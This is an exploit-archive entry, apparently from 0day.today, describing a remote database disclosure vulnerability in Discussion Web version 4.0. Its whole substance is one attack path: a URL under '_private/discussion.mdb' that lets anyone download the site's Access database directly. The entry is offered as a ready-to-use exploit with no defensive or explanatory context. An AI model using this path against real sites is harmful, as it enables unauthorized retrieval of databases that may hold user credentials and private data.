id: 4438
date: 12/14/2008
title: Discussion Web v4 Remote Database Disclosure Vulnerability
author: Pouya_Server
cves: 

==========================================================
Discussion Web v4 Remote Database Disclosure Vulnerability
==========================================================


#########################################################
---------------------------------------------------------
Portal Name: Discussion Web
Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server 
Vulnerability : (DD)
---------------------------------------------------------
#########################################################
[DD]:
http://site.com/[Path]/_private/discussion.mdb

---------------------------------



#  0day.today [2023-03-22]  #